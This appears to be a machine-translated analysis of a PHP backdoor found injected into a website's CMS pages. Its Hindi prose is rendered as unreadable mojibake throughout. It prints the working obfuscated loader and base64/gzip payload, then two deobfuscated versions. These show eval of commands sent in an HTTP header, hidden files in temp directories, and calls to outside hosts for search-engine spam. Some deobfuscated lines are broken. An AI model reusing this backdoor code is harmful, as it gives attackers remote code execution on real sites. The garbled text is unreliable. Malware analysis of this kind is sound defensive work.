Geekly Articles each Day

рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдХреЛрдб рдХреА рдЕрд╡рд╣реЗрд▓рдирд╛

рдирдпрд╛ рдХреНрд▓рд╛рдЗрдВрдЯ рдЕрдкрдиреА рд╡реЗрдмрд╕рд╛рдЗрдЯ рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддрд╛ рдерд╛, рдЬрд┐рд╕рдореЗрдВ рд╕рд╛рдордЧреНрд░реА рдкреНрд░рдмрдВрдзрди рдкреНрд░рдгрд╛рд▓реА рдХреЗ рд╕реИрдХрдбрд╝реЛрдВ рд╕реНрдерд┐рд░ рдкреГрд╖реНрда рд╢рд╛рдорд┐рд▓ рдереЗ, рдФрд░ рд╕рд╛рде рд╣реА рд╕рд╛рде рд╣рдорд╛рд░реА рд╣реЛрд╕реНрдЯрд┐рдВрдЧ рднреАред рд╕рд╛рдЗрдЯ рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ, рдПрдХ рддреНрд╡рд░рд┐рдд рдЬрд╛рдВрдЪ рдХреА рдЧрдИ рдереА рдФрд░ рдкреНрд░рддреНрдпреЗрдХ рдкреГрд╖реНрда рдХреА рд╢реБрд░реБрдЖрдд рдореЗрдВ рдПрдХ рдХреЛрдб рдкрд╛рдпрд╛ рдЧрдпрд╛ рдерд╛:

/*versio:2.19*/$QQO0=95850;if (!function_exists('QQ00OOO0')){$GLOBALS['QQO0'] = 'AsY3VybAaX2luaXQWywYWxsb3dfdXJsX2ZvcGVu?#MQ(G~aHR0cDovLwwVeJndheT1maWxlX2dldF9jb250ZW50cw_=X3NldG9wdATX2V4ZWMqJndheT1jdXJssyiuQLwZOHhb3Nvbi5pbghP%cnllcGR4LmNvbQ{cGhwYWlkZS5jb20_k!dwWV8zOgNtYZGlzcGxheV9lcnJvcnMZGV0ZXJtaW5hdG9ytZnRwMTMdIMi4xOQUU9PMDBPUVFRUTAXfHYmFzZTY0X2RlY29kZQeLF~XsYmFzZTY0X2VuY29kZQVGSFRUUFMemoLb2ZmaHR0cHM6Ly8Mp*vo&SFRUUF9IT1NUDE^.dW5pb24$c2VsZWN0^{&UkVRVUVTVF9VUkkDGU0NSSVBUX05BTUUqNctUVVFUllfU1RSSU5HPwGNSL3RtcC8uZm9udC11bml4NmsL3RtcC8uSUNFLXVuaXgdtVE1QAYVEVNUA_SVE1QRElSL3RtcAqT^dXBsb2FkX3RtcF9kaXI(dG1wOd3AtY29udGVudC91cGxvYWRzVnd3AtY29udGVudC9jYWNoZQZmLgT?admVyc2lvNLQILXBocAWSFRUUF9FWEVDUEhQpb3V0jb2sTSFRUUF9VU0VSX0FHRU5Uc%LAF*Z29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgZiL3BnLnBocD91PQ!';function QQ00OOO0($a, $b){$c=$GLOBALS['QQO0']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};$QQQ00QOO0 = QQ00OOO0(3375, 16);$QQQ00QOO0("/Q00OQOQQ0/e", QQ00OOO0(746, 2627), "Q00OQOQQ0");};

рдЖрдкрдХреЛ рдХреЛрдб рд╡рд╛рдкрд╕ рд╕рд╛рдорд╛рдиреНрдп рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ рдФрд░ рдпрд╣ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рд╣реИ рдХрд┐ рдпрд╣ рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ:
 $QQO0=95850; if (!function_exists('QQ00OOO0')) { $GLOBALS['QQO0'] = '   base64'; function QQ00OOO0($a, $b){ $c=$GLOBALS['QQO0']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b)); }; $QQQ00QOO0 = QQ00OOO0(3375, 16); $QQQ00QOO0("/Q00OQOQQ0/e", QQ00OOO0(746, 2627), "Q00OQOQQ0"); };

рд╕рдм рдХреБрдЫ рд╕рд╣реА рд╣реИ, рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдХреЛрдб рддреНрд░реБрдЯрд┐рдпреЛрдВ рдХрд╛ рдЙрддреНрдкрд╛рджрди рдирд╣реАрдВ рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП, рдЗрд╕рд▓рд┐рдП рд╣рдорд▓рд╛рд╡рд░ рдпрд╣ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд╛рдВрдЪрддрд╛ рд╣реИ рдХрд┐ рдХреНрдпрд╛ QQ00OOO0 рдлрд╝рдВрдХреНрд╢рди рдкрд╣рд▓реЗ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред
 pack('H*','6261736536345f6465636f'.'6465')

рдпрд╣ рд╕рд┐рд░реНрдл base64_decode рд╣реИред рдЗрд╕рд▓рд┐рдП, QQ00OOO0 рдлрд╝рдВрдХреНрд╢рди рд╣рдорд╛рд░реА рд▓рдВрдмреА-рд▓рдВрдмрд╛рдИ рд╡рд╛рд▓реА рд╕реНрдЯреНрд░рд┐рдВрдЧ рдХрд╛ рдПрдХ рдЯреБрдХрдбрд╝рд╛ рд▓реЗрддрд╛ рд╣реИ, рдЗрд╕реЗ рдЗрдирдкреБрдЯ рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рдЕрдиреБрд╕рд╛рд░ рдЫреЛрдЯрд╛ рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдмреЗрд╕ 64 рд╕реЗ рдбреАрдХреЛрдб рдХрд░рддрд╛ рд╣реИред
рдЕрдм рдпрд╣ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рд╕реНрдкрд╖реНрдЯ рд╣реИ рдХрд┐
 $QQQ00QOO0 = QQ00OOO0(3375, 16);

- preg_replaceред
QQ00OOO0 (746, 2627) рд╣рдорд╛рд░реА рд▓рдВрдмреА рд▓рд╛рдЗрди рд╕реЗ рдПрдХ рд╕рдмрд╕реНрдЯреНрд░рд┐рдВрдЧ рдореЗрдВ рдХрдЯреМрддреА рдФрд░ рд╣реЛ рдЬрд╛рддреА рд╣реИ
 eval(gzuncompress(base64_decode("eJyVV21v2kgQ/isbFEW25Pq8NgZyOZ9ALWks5XAgpFLVIovC0lg1dmSbS6so//1m9oVdEpO7gw+Yndl5n2fG2YZYJ2u2yQq2tjpr1rBqmxXLpqw6tv1ENrti1WRlQUxKumHlxjqNYxrnuUPOTmNKaRyTiEzurq9t8kT0yTZbVWWTbZnVVDtmX5CKNbuqIKYIOH3Wmr6zZpPlDIh5TPPYIadTz0uSqY1i4UMpiJ3ys8SzfIf04D4wwwcVSh53z3HukD5wDLMiS2vWWHsCBYrv2Q6hQM4gDpzlewuLTSJDZZfCoa3dpNEQDcab6aosGlY0tRbR7YECzyYukQ7hk/DI1TJDUBSAon18pGiMDMtrhuapCKXsZ1aDCukzpul0Ok1AFrg/lKcWBgWkg/zWoFBuFQYOtMStgaOeL0MnBVlSjUPe382uk5t5Cj8O+Z+uUgoCqG+/KfhqPPownjmbJfj+JuNsPL+bTeaz0eT2Ei7IIjvO/z6ZTMbv5/P4r3FyN3dIKIpHVutQhkPdQ1GrXZWnq7ysmXGK+WDbh+aXJS9DFrQY7asfOAT4n3VaOY9KK68h3gOofFOXqx/lAyt07Q88rP/Em3oJPkw9eBZGowWqf7iYHCTTNuXksD/Bpc3DjtePbODOx/GcPMlMPZ89Ln9FaAlryNV8fvMbdb2v1dfiqqyb38mTNO0Zjzq8yJKpKLKbq5s0uTXqx+9jo7h4/mk8u42TSYvuu5pV70bfoWlQuBDGhSsFj/eIBidvAJD0zyZnZ8R6ATjknSb/AdboSLkYcehZwxjqDzgWDTcy33t8guAkYBt4yX4+5OWaWZ29jY4SCXy7AiFGcn/xFrqhs23LPcHHdeIXqyPntTCqquUvA4eCgLeW0WyUd1v34KiHXR1iZ+3R9LHKGixcoHuec8p5PYgCLx/4AwSAL1F0kknL659zpAP24UYJ4lf2gi50rARF+rLXX+4aSDinetMpdxmuJiCSre5Lw/YB2B7YrmQ0qmgQ8iqSF10evw7PUguiI7Sc26LsxVTTVN8Dd2hPAr4ody/SZL8n4A7rBaDQoAShnDJT7qRB6YqIS1JikhDS6UBoQtwwSINAkUQzRS8hVLR3VvNiSm/HM+ifL3umwAvQ0oUt8zg8zkJODEAIaNchXVv0wKHegA5AMZXZk2Q3qpuqKfPykVWtSjAugORY5ZuyYsvVPRRVimiyrInMZPSnTjkaCyIfytqSh7rYgpCixYijKOGLvL6IWsBUTcTjsiD2g/8m6xmssk6Ohrrv8QQvxLw/TufD4zV50BdkTGhbCLtej9fk4t/Eu+YC4vvYEjBd35IoUin6HKYWlLpKa5uhez9FcQAKRcPtOlSTyJVN4UqQl53ASxg+OY3WWVUsAXXT9DK+Hqep7X6IZzBpk9ln0HYzmo3gkffJVACpgDjTq77cx/RRqPq5zdE+xWpeHCH2sWUFcTz5dOTaIQWRZtB+R0nTR+cBHjnk9dIY4t4EVtuOCo5GsxBT122noPvtpBB0+T6QDhpNRhJbDbcW2ARFh52oxUQc8oxS0c+tKRGrb50iwi+/8c3buMlt4eshP7wg30D/j/3EarYP0WuD+2Lyy0q6eIFSHVwr0s/p6G5+1VlEkWRTM0Eh/FDODi124GOCHIXQhsJzqoYEgrpJ6GKa1L6EmxRAkgTrtobseVQ2JE499vcyV7dAxtvm9RBDDwZyD1EmsDmqwtLeWB5/VAEXrzkQQa6rKXere/GXv62s8t2apWWxYupQAN8TUf08hM2UFSvcKuSRnDYeb7Dh2+jdk/12gN5qu9FcXb4DmE5hNYawZcjKw4X2NbaDCc6eehJFl3yTl/PKcJW/vPDF01xd+/wdoYsJ5X7phPb9EIOsSssgBOK14nUN9Lu+vMKrRgz4nO/DxrsmLl6wsOnXzYsXKXk+rHz4/gMmng4H")));

рдЬреИрд╕рд╛ рдХрд┐ рд╣рдо рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдЕрдВрдд рдореЗрдВ рдпрд╣ рд╕рдм рдКрдкрд░ рдкреНрд░рд╛рдкреНрдд рдХреЛрдб рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рдиреАрдЪреЗ рдЖрддрд╛ рд╣реИред рдЪрд▓реЛ рдпрд╣ рдХреЛрдб рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ рдкрд╛рд░реНрд╕ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВред
рдпрд╣рд╛рдБ рдбрд┐рдХреЛрдбрд┐рдВрдЧ рдХреЗ рдмрд╛рдж рд╣рдореЗрдВ рдХреНрдпрд╛ рдорд┐рд▓рддрд╛ рд╣реИ:
 if (!defined("determinator")){ function determinator_feof($II1Ill, &$I111II = NULL) { $I111II = microtime(true); return feof($II1Ill); } function getfile($IlI1lI, $Q00OOQ){ $IIII11 = QQ00OOO0(2, 6); $IllllI = $IIII11.QQ00OOO0(9, 7); @ini_set(QQ00OOO0(19, 20), 1); if (@ini_get(QQ00OOO0(19, 20)) == QQ00OOO0(41, 2)) { $I111I1=@file_get_contents(QQ00OOO0(46, 10) . $IlI1lI . $Q00OOQ. QQ00OOO0(59, 30)); return $I111I1; } elseif (function_exists($IllllI)){ $QQOQQ0 = @$IllllI(); $Q0000O = $IIII11.QQ00OOO0(91, 10); $I1I1II = $IIII11.QQ00OOO0(102, 7); @$Q0000O($QQOQQ0, CURLOPT_URL, QQ00OOO0(46, 10) . $IlI1lI . $Q00OOQ. QQ00OOO0(110, 12)); @$Q0000O($QQOQQ0, CURLOPT_HEADER,false); @$Q0000O($QQOQQ0, CURLOPT_RETURNTRANSFER,true); @$Q0000O($QQOQQ0, CURLOPT_CONNECTTIMEOUT, 5); $Il11II = @$I1I1II($QQOQQ0); @curl_close($QQOQQ0); if (empty($Il11II)){$Il11II = QQ00OOO0(123, 0);} return $Il11II; } else { $II1Ill = @fsockopen($IlI1lI, 80, $QO0Q0O, $QQ0QO0, 5); if ($II1Ill) { $Ill111 = QQ00OOO0(123, 0); $I111II = NULL; @fputs($II1Ill, "GET {$Q00OOQ}&way=socket HTTP/1.0\r\nHost: {$IlI1lI}\r\n"); $QOQ00O = PHP_OS.QQ00OOO0(127, 2).PHP_VERSION; @fputs($II1Ill, "User-Agent: {$QOQ00O}\r\n\r\n"); while(!determinator_feof($II1Ill, $I111II) && (microtime(true) - $I111II) < 2){ $Ill111 .= @fgets($II1Ill, 128); } @fclose($II1Ill); $Q0OQOQ = explode("\r\n\r\n", $Ill111); unset($Q0OQOQ[0]); return implode("\r\n\r\n", $Q0OQOQ); } } } $Il1lll = Array(QQ00OOO0(133, 10), QQ00OOO0(146, 14), QQ00OOO0(161, 15)); function write($QOO000,$QQ00O0){ if ($Q00QOO=@fopen($QOO000,QQ00OOO0(179, 2))){ @fwrite($Q00QOO,$QQ00O0); @fclose($Q00QOO); } } function output($Q000QQ, $Q0QQ0O){ echo QQ00OOO0(181, 3).$Q000QQ.QQ00OOO0(185, 2).$Q0QQ0O."\r\n"; } @ini_set(QQ00OOO0(190, 19), 0); define(QQ00OOO0(209, 16), 1); $Q00OO0=QQ00OOO0(226, 7); $I11III=QQ00OOO0(235, 6); $QQ00QO=QQ00OOO0(241, 15); $QQ00OO=QQ00OOO0(259, 18); $Q0QQOQ=QQ00OOO0(283, 18); $IlI1lI=QQ00OOO0(46, 10); if (isset($_SERVER[QQ00OOO0(303, 7)])){ if (@$_SERVER[QQ00OOO0(303, 7)] != QQ00OOO0(314, 4)){ $IlI1lI=QQ00OOO0(318, 11); } } $IlI1lI.=strtolower(@$_SERVER[QQ00OOO0(335, 12)]); foreach ($_GET as $Q000QQ=>$Q0QQ0O){ if (strpos($Q0QQ0O,QQ00OOO0(351, 7))){$_GET[$Q000QQ]=QQ00OOO0(123, 0);} elseif (strpos($Q0QQ0O,QQ00OOO0(359, 8))){$_GET[$Q000QQ]=QQ00OOO0(123, 0);} } if(!isset($_SERVER[QQ00OOO0(370, 15)])) { $_SERVER[QQ00OOO0(370, 15)] = @$_SERVER[QQ00OOO0(387, 15)]; if(@$_SERVER[QQ00OOO0(406, 16)]) { $_SERVER[QQ00OOO0(370, 15)] .= QQ00OOO0(422, 2) . @$_SERVER[QQ00OOO0(406, 16)]; } } if ($QOQQO0=$IlI1lI.@$_SERVER[QQ00OOO0(370, 15)]){ $IlIlll=@md5($IlI1lI.$I11III.PHP_OS.$QQ00QO); $IIIIl1=dirname(__FILE__).DIRECTORY_SEPARATOR; $QQQQOQ = Array( QQ00OOO0(427, 20), QQ00OOO0(450, 19), @$_SERVER[QQ00OOO0(471, 4)], @$_SERVER[QQ00OOO0(477, 6)], @$_ENV[QQ00OOO0(471, 4)], @$_ENV[QQ00OOO0(485, 8)], @$_ENV[QQ00OOO0(477, 6)], QQ00OOO0(493, 6), @ini_get(QQ00OOO0(502, 19)), $IIIIl1.QQ00OOO0(522, 4), $IIIIl1.QQ00OOO0(527, 24), $IIIIl1.QQ00OOO0(553, 22), ); foreach ($QQQQOQ as $I1I1lI){ if (!empty($I1I1lI)){ $I1I1lI.=DIRECTORY_SEPARATOR; if (@is_writable($I1I1lI)){ $IIIIl1 = $I1I1lI; break; } } } $tmp=$IIIIl1.QQ00OOO0(577, 2).$IlIlll; if (@$_SERVER["HTTP_Y_AUTH"]==$IlIlll){ echo "\r\n"; @output(QQ00OOO0(582, 8), $I11III.QQ00OOO0(591, 2).$Q00OO0.QQ00OOO0(594, 6)); if ($QO0QQQ=$QQ00OO(@$_SERVER[QQ00OOO0(601, 16)])){ @eval($QO0QQQ); echo "\r\n"; @output(QQ00OOO0(618, 4), QQ00OOO0(623, 3)); } exit(0); } if (@is_file($tmp)){ @touch($tmp); @include_once($tmp); } else{ $QOQQO0=@urlencode($QOQQO0); $Q0Q0OQ = @strtolower(@$_SERVER[QQ00OOO0(627, 20)]); foreach (explode(QQ00OOO0(649, 2), QQ00OOO0(653, 55)) as $I1l11I){ if (strpos($Q0Q0OQ, $I1l11I)!==False){ if (@touch($tmp)){ $Q00OOQ = QQ00OOO0(710, 14).$QOQQO0.QQ00OOO0(725, 4).$IlIlll.QQ00OOO0(730, 12).$Q00OO0.QQ00OOO0(742, 4).$I11III; $I11lII = getfile($Il1lll[0], $Q00OOQ); @touch($tmp); } break; } } } } }

рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ рдХрдо рд╕реНрдкрд╖реНрдЯ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдВ рдХрд┐ рдпрд╣ рдХреЛрдб рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИред рд╣рдореЗрдВ рдЗрд╕реЗ рдкреНрд░рд╛рд░реВрдкрд┐рдд рдХрд░рдиреЗ рдФрд░ рд╕рдмрд╕реЗ рд╕рд░рд▓ рдХрд╛рдо рдХрд░рдиреЗ рдХреА рдЬрд╝рд░реВрд░рдд рд╣реИ рдЬреЛ рд╣рдо рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: рд╕рднреА рдХреЙрд▓реЛрдВ рдХреЛ QQ00OOO0 (рд╕рдВрдЦреНрдпрд╛, рд╕рдВрдЦреНрдпрд╛) рдХреЛ рдЙрди рдкрдВрдХреНрддрд┐рдпреЛрдВ рдХреЗ рд╕рд╛рде рдмрджрд▓реЗрдВ рдЬреЛ рдпрд╣ рдлрд╝рдВрдХреНрд╢рди рджреЗрддрд╛ рд╣реИред
рдпрд╣ рд╕реНрд░реЛрдд рдХреЛрдб рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ:
 <?php if (!defined("determinator")){ function determinator_feof($II1Ill, &$I111II = NULL) { $I111II = microtime(true); return feof($II1Ill); } function getfile($IlI1lI, $Q00OOQ){ "curl" = curl; $IllllI = "curl"."_init"; @ini_set("allow_url_fopen", 1); if (@ini_get("allow_url_fopen") == "1") { $I111I1=@file_get_contents("http://" . $IlI1lI . $Q00OOQ. "&way=file_get_contents"); return $I111I1; } elseif (function_exists($IllllI)){ $QQOQQ0 = @$IllllI(); $Q0000O = "curl"."_setopt"; $I1I1II = "curl"."_exec"; @$Q0000O($QQOQQ0, CURLOPT_URL, "http://" . $IlI1lI . $Q00OOQ. "&way=curl"); @$Q0000O($QQOQQ0, CURLOPT_HEADER,false); @$Q0000O($QQOQQ0, CURLOPT_RETURNTRANSFER,true); @$Q0000O($QQOQQ0, CURLOPT_CONNECTTIMEOUT, 5); $Il11II = @$I1I1II($QQOQQ0); @curl_close($QQOQQ0); if (empty($Il11II)){ $Il11II = ""; } return $Il11II; } else { $II1Ill = @fsockopen($IlI1lI, 80, $QO0Q0O, $QQ0QO0, 5); if ($II1Ill) { $Ill111 = ""; $I111II = NULL; @fputs($II1Ill, "GET {$Q00OOQ}&way=socket HTTP/1.0\r\nHost: {$IlI1lI}\r\n"); $QOQ00O = PHP_OS."/".PHP_VERSION; @fputs($II1Ill, "User-Agent: {$QOQ00O}\r\n\r\n"); while(!determinator_feof($II1Ill, $I111II) && (microtime(true) - $I111II) < 2){ $Ill111 .= @fgets($II1Ill, 128); } @fclose($II1Ill); $Q0OQOQ = explode("\r\n\r\n", $Ill111); unset($Q0OQOQ[0]); return implode("\r\n\r\n", $Q0OQOQ); } } } $Il1lll = Array("oson.in", "ryepdx.com", "phpaide.com"); function write($QOO000,$QQ00O0){ if ($Q00QOO=@fopen($QOO000,"w")){ @fwrite($Q00QOO,$QQ00O0); @fclose($Q00QOO); } } function output($Q000QQ, $Q0QQ0O) { echo "Y_".$Q000QQ.":".$Q0QQ0O."\r\n"; } @ini_set("display_errors", 0); define("determinator", 1); $Q00OO0="ftp13"; $I11III="2.19"; $QQ00QO="QOO00OQQQQ0"; $QQ00OO="base64_decode"; $Q0QQOQ="base64_encode"; $IlI1lI="http://"; if (isset($_SERVER["HTTPS"])){ if (@$_SERVER["HTTPS"] != "off"){ $IlI1lI="https://"; } } $IlI1lI.=strtolower(@$_SERVER["HTTP_HOST"]); foreach ($_GET as $Q000QQ=>$Q0QQ0O){ if (strpos($Q0QQ0O,"union")){ $_GET[$Q000QQ]=""; } elseif (strpos($Q0QQ0O,"select")){ $_GET[$Q000QQ]=""; } } if(!isset($_SERVER["REQUEST_URI"])) { $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"]; if(@$_SERVER["QUERY_STRING"]) { $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"]; } } if ($QOQQO0=$IlI1lI.@$_SERVER["REQUEST_URI"]){ $IlIlll=@md5($IlI1lI.$I11III.PHP_OS.$QQ00QO); $IIIIl1=dirname(__FILE__).DIRECTORY_SEPARATOR; $QQQQOQ = Array( "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $IIIIl1."tmp", $IIIIl1."wp-content/uploads", $IIIIl1."wp-content/cache", ); foreach ($QQQQOQ as $I1I1lI){ if (!empty($I1I1lI)){ $I1I1lI.=DIRECTORY_SEPARATOR; if (@is_writable($I1I1lI)){ $IIIIl1 = $I1I1lI; break; } } } $tmp=$IIIIl1.".".$IlIlll; if (@$_SERVER["HTTP_Y_AUTH"]==$IlIlll){ echo "\r\n"; @output("versio", $I11III."-".$Q00OO0."-php"); if ($QO0QQQ=$QQ00OO(@$_SERVER["HTTP_EXECPHP"])){ @eval($QO0QQQ); echo "\r\n"; @output("out", "ok"); } exit(0); } if (@is_file($tmp)){ @touch($tmp); @include_once($tmp); } else{ $QOQQO0=@urlencode($QOQQO0); $Q0Q0OQ = @strtolower(@$_SERVER["HTTP_USER_AGENT"]); foreach (explode(",", "google,yahoo,bing,msnbot,ask,baidu,yandex") as $I1l11I){ if (strpos($Q0Q0OQ, $I1l11I)!==False){ if (@touch($tmp)){ $Q00OOQ = "/pg.php?u=".$QOQQO0."&k=".$IlIlll."&t=php&p=".$Q00OO0."&v=".$I11III; $I11lII = getfile($Il1lll[0], $Q00OOQ); @touch($tmp); } break; } } } } }


рдЕрдм рд╣рдореЗрдВ рдлреЙрд░реНрдо I1l11I рдХреЗ рдЪрд░ рдХреЛ рдФрд░ рдЕрдзрд┐рдХ рд╕реНрдкрд╖реНрдЯ рдХреЗ рд╕рд╛рде рдмрджрд▓рдирд╛ рд╣реЛрдЧрд╛ред рдХреБрдЫ рдЬрдЧрд╣реЛрдВ рдкрд░ рдРрд╕рд╛ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдлрд┐рд░ рднреА рд╣рдо рд╕рдордЭреЗрдВрдЧреЗ рдХрд┐ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЖрдЦрд┐рд░рдХрд╛рд░ рдХреНрдпрд╛ рдХрд░рддреА рд╣реИред рдХреБрдЫ рдЪрд░, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, $ Q00OO0, рдХреЗрд╡рд▓ рддрд╛рд░ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдЙрдирдХреА рдШрдЯрдирд╛рдУрдВ рдХреЛ рдвреВрдВрдврдирд╛ рд╣реЛрдЧрд╛ рдФрд░ рдЙрдирдХреЗ рдореВрд▓реНрдп рдХреЗ рд╕рд╛рде рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рдпрд╣рд╛рдБ рдкрд░рд┐рдгрд╛рдо рд╣реИ:

 if (!defined("determinator")) { function determinator_feof($II1Ill, &$microtime = NULL) { $microtime = microtime(true); return feof($II1Ill); } function getfile($domain, $strURL) { @ini_set("allow_url_fopen", 1); if (@ini_get("allow_url_fopen") == "1") { $I111I1=@file_get_contents("http://" . $domain . $strURL. "&way=file_get_contents"); return $I111I1; } elseif (function_exists("curl_init")){ $objCURL = @curl_init(); @curl_setopt($objCURL, CURLOPT_URL, "http://" . $domain . $strURL. "&way=curl"); @curl_setopt($objCURL, CURLOPT_HEADER,false); @curl_setopt($objCURL, CURLOPT_RETURNTRANSFER,true); @curl_setopt($objCURL, CURLOPT_CONNECTTIMEOUT, 5); $objCURLResult = @curl_exec($objCURL); @curl_close($objCURL); if (empty($objCURLResult)){ $objCURLResult = ""; } return $objCURLResult; } else { $II1Ill = @fsockopen($domain, 80, $QO0Q0O, $QQ0QO0, 5); if ($II1Ill) { $Ill111 = ""; $microtime = NULL; @fputs($II1Ill, "GET {$strURL}&way=socket HTTP/1.0\r\nHost: {$domain}\r\n"); $QOQ00O = PHP_OS."/".PHP_VERSION; @fputs($II1Ill, "User-Agent: {$QOQ00O}\r\n\r\n"); while(!determinator_feof($II1Ill, $microtime) && (microtime(true) - $microtime) < 2){ $Ill111 .= @fgets($II1Ill, 128); } @fclose($II1Ill); $Q0OQOQ = explode("\r\n\r\n", $Ill111); unset($Q0OQOQ[0]); return implode("\r\n\r\n", $Q0OQOQ); } } } $arrSites = Array("oson.in", "ryepdx.com", "phpaide.com"); function write($strFile,$strDataToWrite){ if ($objFileDescriptor=@fopen($strFile,"w")){ @fwrite($objFileDescriptor,$strDataToWrite); @fclose($objFileDescriptor); } } function output($strGETKey, $strGETValue) { echo "Y_".$strGETKey.":".$strGETValue."\r\n"; } @ini_set("display_errors", 0); define("determinator", 1); if (isset($_SERVER["HTTPS"])){ if (@$_SERVER["HTTPS"] != "off"){ $strHost="https://"; } } $strHost.=strtolower(@$_SERVER["HTTP_HOST"]); foreach ($_GET as $strGETKey=>$strGETValue){ if (strpos($strGETValue,"union")){ $_GET[$strGETKey]=""; } elseif (strpos($strGETValue,"select")){ $_GET[$strGETKey]=""; } } if(!isset($_SERVER["REQUEST_URI"])) { $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"]; if(@$_SERVER["QUERY_STRING"]) { $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"]; } } if ($strFullURL="http://".@$_SERVER["REQUEST_URI"]) { $strExploitedServerID=@md5("http://"."2.19".PHP_OS."QOO00OQQQQ0"); $strScriptDirectory=dirname(__FILE__).DIRECTORY_SEPARATOR; $arrPotentiallyVulnDirectories = Array( "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $strScriptDirectory."tmp", $strScriptDirectory."wp-content/uploads", $strScriptDirectory."wp-content/cache", ); foreach ($arrPotentiallyVulnDirectories as $strPotentiallyVulnDirectory){ if (!empty($strPotentiallyVulnDirectory)){ $strPotentiallyVulnDirectory.=DIRECTORY_SEPARATOR; if (@is_writable($strPotentiallyVulnDirectory)){ $strScriptDirectory = $strPotentiallyVulnDirectory; break; } } } $tmp=$strScriptDirectory.".".$strExploitedServerID; if (@$_SERVER["HTTP_Y_AUTH"]==$strExploitedServerID){ echo "\r\n"; @output("versio", "2.19"."-"."ftp13"."-php"); if ($strCommand = base64_decode(@$_SERVER["HTTP_EXECPHP"])){ @eval($strCommand); echo "\r\n"; @output("out", "ok"); } exit(0); } if (@is_file($tmp)){ @touch($tmp); @include_once($tmp); } else{ $strFullURL=@urlencode($strFullURL); $strUserAgent = @strtolower(@$_SERVER["HTTP_USER_AGENT"]); foreach (explode(",", "google,yahoo,bing,msnbot,ask,baidu,yandex") as $strSearchEngineAgent){ if (strpos($strUserAgent, $strSearchEngineAgent)!==False){ if (@touch($tmp)){ $strURL = "/pg.php?u=".$strFullURL."&k=".$strExploitedServerID."&t=php&p="."ftp13"."&v="."2.19"; $I11lII = getfile($arrSites[0], $strURL); @touch($tmp); } break; } } } } }


рдЗрд╕рд▓рд┐рдП, рдпрд╣ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рд╕реНрдкрд╖реНрдЯ рд╣реЛ рдЧрдпрд╛ рд╣реИ рдХрд┐ рдпрд╣ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреНрдпрд╛ рдХрд░рддреА рд╣реИ: if (? Defined ("рдирд┐рд░реНрдзрд╛рд░рдХ")) {рд╢рд╛рдорд┐рд▓_ рдХрд╛ рдПрдХ рд╕рд░рд▓ рдПрдирд╛рд▓реЙрдЧ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдмреБрд░реЗ рд▓реЛрдЧ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдирд╣реАрдВ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдХрд┐ рдЙрдирдХреА рдЧрддрд┐рд╡рд┐рдзрд┐ рддреНрд░реБрдЯрд┐ рд╕рдВрджреЗрд╢реЛрдВ рдХреЗ рдХрд╛рд░рдг рджрд┐рдЦрд╛рдИ рджреЗред
